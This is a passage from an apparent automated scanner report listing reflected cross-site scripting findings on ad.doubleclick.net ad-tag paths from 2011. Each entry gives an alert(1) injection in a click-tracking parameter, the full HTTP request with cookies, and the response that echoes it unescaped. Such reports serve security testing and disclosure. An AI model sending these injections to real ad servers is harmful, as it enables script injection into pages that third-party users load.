Path:	/adj/N553.mediamath/B5123370.39

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fff0'-alert(1)-'ffda1174523 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.39;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=1110405fff0'-alert(1)-'ffda1174523&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=62143273837836637? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:39:46 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:39:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/c/a6/%2a/y;235638469;0-0;0;59396963;4307-300/250;40463876/40481663/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=1110405fff0'-alert(1)-'ffda1174523&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.39 [mt_uuid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.39

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2189e'-alert(1)-'c832bc7aecd was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.39;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b2189e'-alert(1)-'c832bc7aecd&redirect=;ord=62143273837836637? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:41:04 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:41:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/c/a6/%2a/y;235638469;0-0;0;59396963;4307-300/250;40463876/40481663/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b2189e'-alert(1)-'c832bc7aecd&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.39 [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.39

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be2f4'-alert(1)-'2eb20d7ebec was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.39;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=be2f4'-alert(1)-'2eb20d7ebec HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 520
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 20 Mar 2011 12:41:41 GMT
Expires: Sun, 20 Mar 2011 12:41:41 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/c/a6/%2a/y;235638469;0-0;0;59396963;4307-300/250;40463876/40481663/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=62143273837836637&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=be2f4'-alert(1)-'2eb20d7ebechttps%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.39 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.39

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62508'-alert(1)-'389b203a6de was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.39;sz=300x250;pc=;click1=http://pixel.mathtag.com/click/img?mt_aid=6214327383783663762508'-alert(1)-'389b203a6de&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=62143273837836637? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82MjE0MzI3MzgzNzgzNjYzNy8xMTEwNDAvMTAyMDY1LzMvUWk0TlZFWk5SbHYyNzBhYklEZU9pd3Nzb1g4SlNGczg1RjlCN293LWNUay8/InA55NeIGGV4hzZENaajIegtkxo&price=3.757000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:39:21 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:39:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 520

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ad0/c/a6/%2a/y;235638469;0-0;0;59396963;4307-300/250;40463876/40481663/1;;~sscs=%3fhttp://pixel.mathtag.com/click/img?mt_aid=6214327383783663762508'-alert(1)-'389b203a6de&mt_id=111040&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww.americanexpress.com/gift/giftcardslanding.shtml%3Fsource%3Ddisplay_mm">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [mt_adid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dfae9'-alert(1)-'918d9040056 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70dfae9'-alert(1)-'918d9040056&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:45:24 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:45:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3ad0/f/a6/%2a/w%3B235630583%3B0-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70dfae9'-alert(1)-'918d9040056&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [mt_adid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 159be"-alert(1)-"d6991886b10 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70159be"-alert(1)-"d6991886b10&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:45:19 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:45:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
lick%3Bh%3Dv8/3ad0/f/a6/%2a/w%3B235630583%3B0-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70159be"-alert(1)-"d6991886b10&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [mt_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8deb3'-alert(1)-'80cf1f570ff was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=1096758deb3'-alert(1)-'80cf1f570ff&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:44:40 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:44:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3ad0/f/a6/%2a/w%3B235630583%3B0-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=1096758deb3'-alert(1)-'80cf1f570ff&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [mt_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e7516"-alert(1)-"8a8e2518d20 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675e7516"-alert(1)-"8a8e2518d20&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:44:36 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:44:36 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
click.net/click%3Bh%3Dv8/3ad0/f/a6/%2a/w%3B235630583%3B0-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675e7516"-alert(1)-"8a8e2518d20&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26sell
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [mt_uuid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb066'-alert(1)-'38b1668e9d4 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bfb066'-alert(1)-'38b1668e9d4&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:46:07 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:46:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624bfb066'-alert(1)-'38b1668e9d4&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [mt_uuid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18cba"-alert(1)-"08c3b58a41c was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b18cba"-alert(1)-"08c3b58a41c&redirect=;ord=66490547929921892? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=pub&id=5aW95q2jLzEvTkROQk9FRkNSa0V0TnpRNU55MDBOekZCTFRsQlJqWXRNamszTkVReE4wVkdNek0xL05HUTFZakl6TnpFdE16a3lPQzAzWVRnekxUSTBabUl0WkRVeU16STRaalUyTWpSaS82NjQ5MDU0NzkyOTkyMTg5Mi8xMDk2NzUvMTAyMTc0LzMvcUNrUlV0a2tSODZTZllSNWtDMUZwb3dud0hreW5rUUl0bkxKeWNpUWlUcy8/65jF72MGHLbwsG7rxNVZ3X0o4uc&price=3.050000
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 20 Mar 2011 12:46:03 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 12:46:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6894

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
-0%3B0%3B59396912%3B4307-300/250%3B39654878/39672665/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b18cba"-alert(1)-"08c3b58a41c&redirect=https%3a%2f%2fwww232.americanexpress.com/BOLWeb/bolfeOrder.do%3Frequest_type%3DorderProduct%26promotion%3DACP%26program%3DACPBUS%26selleracctnbr%3D6430098999I%26source%3Ddisplay_MM");
var fs
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N553.mediamath/B5123370.4 [redirect parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N553.mediamath/B5123370.4

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 410c5"-alert(1)-"4ae461324e6 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N553.mediamath/B5123370.4;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=66490547929921892&mt_id=109675&mt_adid=70&mt_uuid=4d5b2371-3928-7a83-24fb-d52328f5624b&redirect=410c5"-alert(1)-"4ae461324e6 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
